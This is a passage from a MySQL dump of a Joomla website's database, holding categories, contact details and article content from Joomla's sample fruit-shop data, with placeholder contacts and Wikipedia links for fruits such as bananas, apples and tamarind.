00:00:01',0,'*',1),(48,73,37,50,51,4,'sample-data-contact/shop-site/fruit-encyclopedia/k','com_contact','K','k','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(49,74,37,52,53,4,'sample-data-contact/shop-site/fruit-encyclopedia/l','com_contact','L','l','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(50,75,37,54,55,4,'sample-data-contact/shop-site/fruit-encyclopedia/m','com_contact','M','m','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(51,76,37,56,57,4,'sample-data-contact/shop-site/fruit-encyclopedia/n','com_contact','N','n','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(52,77,37,58,59,4,'sample-data-contact/shop-site/fruit-encyclopedia/o','com_contact','O','o','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(53,78,37,60,61,4,'sample-data-contact/shop-site/fruit-encyclopedia/p','com_contact','P','p','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(54,79,37,62,63,4,'sample-data-contact/shop-site/fruit-encyclopedia/q','com_contact','Q','q','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(55,80,37,64,65,4,'sample-data-contact/shop-site/fruit-encyclopedia/r','com_contact','R','r','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(56,81,37,66,67,4,'sample-data-contact/shop-site/fruit-encyclopedia/s','com_contact','S','s','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(57,82,37,68,69,4,'sample-data-contact/shop-site/fruit-encyclopedia/t','com_contact','T','t','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(58,83,37,70,71,4,'sample-data-contact/shop-site/fruit-encyclopedia/u','com_contact','U','u','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(59,84,37,72,73,4,'sample-data-contact/shop-site/fruit-encyclopedia/v','com_contact','V','v','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(60,85,37,74,75,4,'sample-data-contact/shop-site/fruit-encyclopedia/w','com_contact','W','w','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(61,86,37,76,77,4,'sample-data-contact/shop-site/fruit-encyclopedia/x','com_contact','X','x','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(62,87,37,78,79,4,'sample-data-contact/shop-site/fruit-encyclopedia/y','com_contact','Y','y','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(63,88,37,80,81,4,'sample-data-contact/shop-site/fruit-encyclopedia/z','com_contact','Z','z','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(77,169,14,12,15,2,'sample-data-articles/features','com_content','Features','features','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',736,'2011-06-11 06:18:31',0,'0000-00-00 00:00:00',0,'*',1),(78,180,77,13,14,3,'sample-data-articles/features/typography','com_content','Typography','typography','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',736,'2012-11-18 12:35:11',0,'0000-00-00 00:00:00',0,'*',1),(79,191,1,93,96,1,'pages','com_content','Pages','pages','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',736,'2013-12-09 05:09:23',0,'0000-00-00 00:00:00',0,'*',1),(80,196,79,94,95,2,'pages/slider','com_content','Slider','slider','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',736,'2013-12-10 06:33:39',462,'2013-12-10 06:33:49',0,'*',1),(81,203,1,97,98,1,'pages','com_contact','Pages','pages','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',736,'2013-12-12 06:33:17',0,'0000-00-00 00:00:00',0,'*',1),(82,205,1,99,100,1,'oman','com_content','Oman','oman','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',736,'2013-12-18 08:21:21',736,'2015-03-15 07:39:18',0,'*',1),(83,218,1,101,102,1,'pslider','com_content','PSlider','pslider','','',1,736,'2015-03-12 11:52:11',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',736,'2013-12-19 06:11:29',0,'0000-00-00 00:00:00',0,'*',1),(84,225,1,103,104,1,'uae','com_content','UAE','uae','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',736,'2014-03-30 10:06:51',736,'2015-03-15 07:40:21',0,'*',1),(85,226,1,105,106,1,'bootstrap','com_content','Bootstrap','bootstrap','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',736,'2014-03-30 10:07:05',0,'0000-00-00 00:00:00',0,'*',1); /*!40000 ALTER TABLE `fit_categories` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_contact_details` -- DROP TABLE IF EXISTS `fit_contact_details`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_contact_details` ( `id` int(11) NOT NULL auto_increment, `name` varchar(255) NOT NULL default '', `alias` varchar(255) character set utf8 collate utf8_bin NOT NULL default '', `con_position` varchar(255) default NULL, `address` text, `suburb` varchar(100) default NULL, `state` varchar(100) default NULL, `country` varchar(100) default NULL, `postcode` varchar(100) default NULL, `telephone` varchar(255) default NULL, `fax` varchar(255) default NULL, `misc` mediumtext, `image` varchar(255) default NULL, `email_to` varchar(255) default NULL, `default_con` tinyint(1) unsigned NOT NULL default '0', `published` tinyint(1) NOT NULL default '0', `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `params` text NOT NULL, `user_id` int(11) NOT NULL default '0', `catid` int(11) NOT NULL default '0', `access` int(10) unsigned default NULL, `mobile` varchar(255) NOT NULL default '', `webpage` varchar(255) NOT NULL default '', `sortname1` varchar(255) NOT NULL, `sortname2` varchar(255) NOT NULL, `sortname3` varchar(255) NOT NULL, `language` char(7) NOT NULL, `created` datetime NOT NULL default '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL default '0', `created_by_alias` varchar(255) NOT NULL default '', `modified` datetime NOT NULL default '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL default '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `metadata` text NOT NULL, `featured` tinyint(3) unsigned NOT NULL default '0' COMMENT 'Set if article is featured.', `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', `version` int(10) unsigned NOT NULL default '1', `hits` int(10) unsigned NOT NULL default '0', PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`published`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_featured_catid` (`featured`,`catid`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_contact_details` -- LOCK TABLES `fit_contact_details` WRITE; /*!40000 ALTER TABLE `fit_contact_details` DISABLE KEYS */; INSERT INTO `fit_contact_details` VALUES (1,'Single Contact','name','Position','Street Address','Suburb','State','Country','Zip Code','Telephone','Fax','<p>Information about or by the contact.</p>','images/powered_by.png','email@email.com',1,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"hide\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"Twitter\",\"linka\":\"http:\\/\\/twitter.com\\/joomla\",\"linkb_name\":\"YouTube\",\"linkb\":\"http:\\/\\/www.youtube.com\\/user\\/joomla\",\"linkc_name\":\"Facebook\",\"linkc\":\"http:\\/\\/www.facebook.com\\/joomla\",\"linkd_name\":\"FriendFeed\",\"linkd\":\"http:\\/\\/friendfeed.com\\/joomla\",\"linke_name\":\"Scribed\",\"linke\":\"http:\\/\\/www.scribd.com\\/people\\/view\\/504592-joomla\",\"contact_layout\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"0\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,16,1,'','','last','first','middle','en-GB','2011-01-01 00:00:01',736,'','2013-12-12 06:39:05',462,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,0),(2,'Webmaster','webmaster','','','','','','','','','','','webmaster@example.com',0,-2,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,34,1,'','','','','','en-GB','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,0),(3,'Owner','owner','','','','','','','','','<p>I\'m the owner of this store.</p>','','',0,-2,0,'0000-00-00 00:00:00',2,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,36,1,'','','','','','*','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,0),(4,'Buyer','buyer','','','','','','','','','<p>I am in charge of buying fruit. If you sell good fruit, contact me.</p>','','',0,-2,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"0\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,36,1,'','','','','','*','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,0),(5,'Bananas','bananas','Scientific Name: Musa','Image Credit: Enzik\r\nRights: Creative Commons Share Alike Unported 3.0\r\nSource: http://commons.wikimedia.org/wiki/File:Bananas_-_Morocco.jpg','','Type: Herbaceous','Large Producers: India, China, Brasil','','','','<p>Bananas are a great source of potassium.</p>\r\n<p> </p>','images/sampledata/fruitshop/bananas_2.jpg','',0,-2,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"show_with_link\",\"show_contact_list\":\"\",\"presentation_style\":\"plain\",\"show_name\":\"\",\"show_position\":\"1\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"1\",\"show_postcode\":\"\",\"show_country\":\"1\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Wikipedia: Banana English\",\"linka\":\"http:\\/\\/en.wikipedia.org\\/wiki\\/Banana\",\"linkb_name\":\"Wikipedia: \\u0939\\u093f\\u0928\\u094d\\u0926\\u0940 \\u0915\\u0947\\u0932\\u093e\",\"linkb\":\"http:\\/\\/hi.wikipedia.org\\/wiki\\/%E0%A4%95%E0%A5%87%E0%A4%B2%E0%A4%BE\",\"linkc_name\":\"Wikipedia:Banana Portugu\\u00eas\",\"linkc\":\"http:\\/\\/pt.wikipedia.org\\/wiki\\/Banana\",\"linkd_name\":\"Wikipedia: \\u0411\\u0430\\u043d\\u0430\\u043d \\u0420\\u0443\\u0441\\u0441\\u043a\\u0438\\u0439\",\"linkd\":\"http:\\/\\/ru.wikipedia.org\\/\\u0411\\u0430\\u043d\\u0430\\u043d\",\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"beez5:encyclopedia\"}',0,39,1,'','','','','','*','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,0),(6,'Apples','apples','Scientific Name: Malus domestica','Image Credit: Fievet\r\nRights: Public Domain\r\nSource: http://commons.wikimedia.org/wiki/File:Pommes_vertes.JPG','','Family: Rosaceae','Large: Producers: China, United States','','','','<p>Apples are a versatile fruit, used for eating, cooking, and preserving.</p>\r\n<p>There are more that 7500 different kinds of apples grown around the world.</p>','images/sampledata/fruitshop/apple.jpg','',0,-2,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"plain\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Wikipedia: Apples English\",\"linka\":\"http:\\/\\/en.wikipedia.org\\/wiki\\/Apple\",\"linkb_name\":\"Wikipedia: Manzana Espa\\u00f1ol \",\"linkb\":\"http:\\/\\/es.wikipedia.org\\/wiki\\/Manzana\",\"linkc_name\":\"Wikipedia: \\u82f9\\u679c \\u4e2d\\u6587\",\"linkc\":\"http:\\/\\/zh.wikipedia.org\\/zh\\/\\u82f9\\u679c\",\"linkd_name\":\"Wikipedia: Tofaa Kiswahili\",\"linkd\":\"http:\\/\\/sw.wikipedia.org\\/wiki\\/Tofaa\",\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"beez5:encyclopedia\"}',0,38,1,'','','','','','*','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,0),(7,'Tamarind','tamarind','Scientific Name: Tamarindus indica','Image Credit: Franz Eugen Köhler, Köhler\'s Medizinal-Pflanzen \r\nRights: Public Domain\r\nSource:http://commons.wikimedia.org/wiki/File:Koeh-134.jpg','','Family: Fabaceae','Large Producers: India, United States','','','','<p>Tamarinds are a versatile fruit used around the world. In its young form it is used in hot sauces; ripened it is the basis for many refreshing drinks.</p>\r\n<p> </p>','images/sampledata/fruitshop/tamarind.jpg','',0,-2,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"plain\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Wikipedia: Tamarind English\",\"linka\":\"http:\\/\\/en.wikipedia.org\\/wiki\\/Tamarind\",\"linkb_name\":\"Wikipedia: \\u09a4\\u09c7\\u0981\\u09a4\\u09c1\\u09b2 \\u09ac\\u09be\\u0982\\u09b2\\u09be \",\"linkb\":\"http:\\/\\/bn.wikipedia.org\\/wiki\\/\\u09a4\\u09c7\\u0981\\u09a4\\u09c1\\u09b2 \",\"linkc_name\":\"Wikipedia: Tamarinier Fran\\u00e7ais\",\"linkc\":\"http:\\/\\/fr.wikipedia.org\\/wiki\\/Tamarinier\",\"linkd_name\":\"Wikipedia:Tamaline lea faka-Tonga\",\"linkd\":\"http:\\/\\/to.wikipedia.org\\/wiki\\/Tamaline\",\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"beez5:encyclopedia\"}',0,57,1,'','','','','','*','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,0),(8,'Shop Address','shop-address','','','Our City','Our Province','Our Country','','555-555-5555','','<p>Here are directions for how to get to our shop.</p>','','',0,-2,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,35,1,'','','','','','*','2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,0),(9,'Contact us - page 1','name','Position','Street Address','Suburb','State','Country','Zip Code','Telephone','Fax','','images/powered_by.png','email@email.com',1,1,736,'2015-03-12 06:57:46',1,'{\"show_contact_category\":\"hide\",\"show_contact_list\":\"0\",\"presentation_style\":\"plain\",\"show_tags\":\"\",\"show_name\":\"0\",\"show_position\":\"0\",\"show_email\":\"0\",\"show_street_address\":\"0\",\"show_suburb\":\"0\",\"show_state\":\"0\",\"show_postcode\":\"0\",\"show_country\":\"0\",\"show_telephone\":\"0\",\"show_mobile\":\"0\",\"show_fax\":\"0\",\"show_webpage\":\"0\",\"show_misc\":\"1\",\"show_image\":\"0\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_profile\":\"0\",\"show_links\":\"0\",\"linka_name\":\"Twitter\",\"linka\":\"http:\\/\\/twitter.com\\/joomla\",\"linkb_name\":\"YouTube\",\"linkb\":\"http:\\/\\/www.youtube.com\\/user\\/joomla\",\"linkc_name\":\"Facebook\",\"linkc\":\"http:\\/\\/www.facebook.com\\/joomla\",\"linkd_name\":\"FriendFeed\",\"linkd\":\"http:\\/\\/friendfeed.com\\/joomla\",\"linke_name\":\"Scribed\",\"linke\":\"http:\\/\\/www.scribd.com\\/people\\/view\\/504592-joomla\",\"contact_layout\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,81,1,'','','last','first','middle','en-GB','2011-01-01 00:00:01',736,'','2015-03-12 06:47:11',736,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',3,2530),(10,'Contact us - page 2','contact-us-page-2','Position','Street Address','Suburb','State','Country','Zip Code','Telephone','Fax','','images/expose-site-logo.png','email@email.com',1,1,736,'2015-03-12 06:53:31',1,'{\"show_contact_category\":\"hide\",\"show_contact_list\":\"0\",\"presentation_style\":\"plain\",\"show_name\":\"0\",\"show_position\":\"0\",\"show_email\":\"0\",\"show_street_address\":\"0\",\"show_suburb\":\"0\",\"show_state\":\"0\",\"show_postcode\":\"0\",\"show_country\":\"0\",\"show_telephone\":\"0\",\"show_mobile\":\"0\",\"show_fax\":\"0\",\"show_webpage\":\"0\",\"show_misc\":\"0\",\"show_image\":\"0\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_profile\":\"0\",\"show_links\":\"0\",\"linka_name\":\"Twitter\",\"linka\":\"http:\\/\\/twitter.com\\/joomla\",\"linkb_name\":\"YouTube\",\"linkb\":\"http:\\/\\/www.youtube.com\\/user\\/joomla\",\"linkc_name\":\"Facebook\",\"linkc\":\"http:\\/\\/www.facebook.com\\/joomla\",\"linkd_name\":\"FriendFeed\",\"linkd\":\"http:\\/\\/friendfeed.com\\/joomla\",\"linke_name\":\"Scribed\",\"linke\":\"http:\\/\\/www.scribd.com\\/people\\/view\\/504592-joomla\",\"contact_layout\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,81,1,'','','last','first','middle','en-GB','2011-01-01 00:00:01',736,'','2013-12-13 13:54:14',462,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,0); /*!40000 ALTER TABLE `fit_contact_details` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_content` -- DROP TABLE IF EXISTS `fit_content`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_content` ( `id` int(10) unsigned NOT NULL auto_increment, `asset_id` int(10) unsigned NOT NULL default '0' COMMENT 'FK to the #__assets table.', `title` varchar(255) NOT NULL default '', `alias` varchar(255) character set utf8 collate utf8_bin NOT NULL default '', `introtext` mediumtext NOT NULL, `fulltext` mediumtext NOT NULL, `state` tinyint(3) NOT NULL default '0', `catid` int(10) unsigned NOT NULL default '0', `created` datetime NOT NULL default '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL default '0', `created_by_alias` varchar(255) NOT NULL default '', `modified` datetime NOT NULL default '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL default '0', `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', `images` text NOT NULL, `urls` text NOT NULL, `attribs` varchar(5120) NOT NULL, `version` int(10) unsigned NOT NULL default '1', `ordering` int(11) NOT NULL default '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `access` int(10) unsigned NOT NULL default '0', `hits` int(10) unsigned NOT NULL default '0', `metadata` text NOT NULL, `featured` tinyint(3) unsigned NOT NULL default '0' COMMENT 'Set if article is featured.', `language` char(7) NOT NULL COMMENT 'The language code for the article.', `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`state`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_featured_catid` (`featured`,`catid`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB AUTO_INCREMENT=140 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_content` -- LOCK TABLES `fit_content` WRITE; /*!40000 ALTER TABLE `fit_content` DISABLE KEYS */; INSERT INTO `fit_content` VALUES (8,104,'Beginners','beginners','<p>If this is your first Joomla site or your first web site, you have come to the right place. Joomla will help you get your website up and running quickly and easily.</p>\r\n<p>Start off using your site by logging in using the administrator account you created when you installed Joomla!.</p>\r\n','\r\n<p>Explore the articles and other resources right here on your site data to learn more about how Joomla works.(When you\'re done reading, you can delete or archive all of this.) You will also probably want to visit the beginners\' areas of the <a href=\"http://docs.joomla.org/Beginners\">Joomla documentation</a> and <a href=\"http://forum.joomla.org\">support forums</a>.</p>\r\n<p>You\'ll also want to sign up for the Joomla Security Mailing list and the Announcements mailing list. For inspiration visit the Joomla Site Showcase to see an amazing array of ways people use Joomla to tell their stories on the 